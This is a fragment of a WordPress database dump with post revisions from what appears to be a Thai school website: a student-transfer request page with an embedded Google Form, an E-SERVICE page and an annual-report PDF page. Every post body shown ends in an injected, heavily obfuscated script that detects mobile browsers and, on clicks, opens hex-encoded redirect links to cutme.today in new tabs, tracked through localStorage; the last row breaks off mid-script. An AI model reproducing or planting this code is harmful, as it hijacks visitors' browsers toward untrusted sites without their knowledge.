(701,1,'2024-08-08 15:04:28','2024-08-08 08:04:28','<!-- wp:paragraph -->\n<p>กรอกข้อมูล ในแบบฟอร์ม ให้ครบถ้วน แล้วทางโรงเรียนจะติดต่อกลับเพื่อ มารับคำขอย้ายโรงเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>หมายเหตุ : กรอกข้อมูลไม่ครบถ้วน ไม่รับพิจารณาขอย้าย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSfTrFBwCoHyb8ISwfCACpe5sKpc1iodVua4jH3_yiG0DL0AEA/viewform?embedded=true\" width=\"1500\" height=\"600\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">กำลังโหลด…</iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แบบคำขอการย้ายนักเรียน','','inherit','closed','closed','','700-revision-v1','','','2024-08-08 15:04:28','2024-08-08 08:04:28','',700,'http://pakhaeng.ssk.in.th/?p=701',0,'revision','',0),
(702,1,'2024-08-08 15:48:49','2024-08-08 08:48:49','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"882f61c5\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-882f61c5 gb-headline-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\">แบบคำขอการย้ายนักเรียนออนไลน์</a></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p>กรอกข้อมูล ในแบบฟอร์ม ให้ครบถ้วน แล้วทางโรงเรียนจะติดต่อกลับเพื่อ มารับคำขอย้ายโรงเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>หมายเหตุ : กรอกข้อมูลไม่ครบถ้วน ไม่รับพิจารณาขอย้าย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-08 15:48:49','2024-08-08 08:48:49','',459,'http://pakhaeng.ssk.in.th/?p=702',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(703,1,'2024-08-08 16:02:04','2024-08-08 09:02:04','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":704,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการปฏิบัติงานประจำปี\"></object><a id=\"wp-block-file--media-0e250fcb-517a-44a8-a574-b3f80330476c\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">รายงานผลการปฏิบัติงานประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-0e250fcb-517a-44a8-a574-b3f80330476c\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 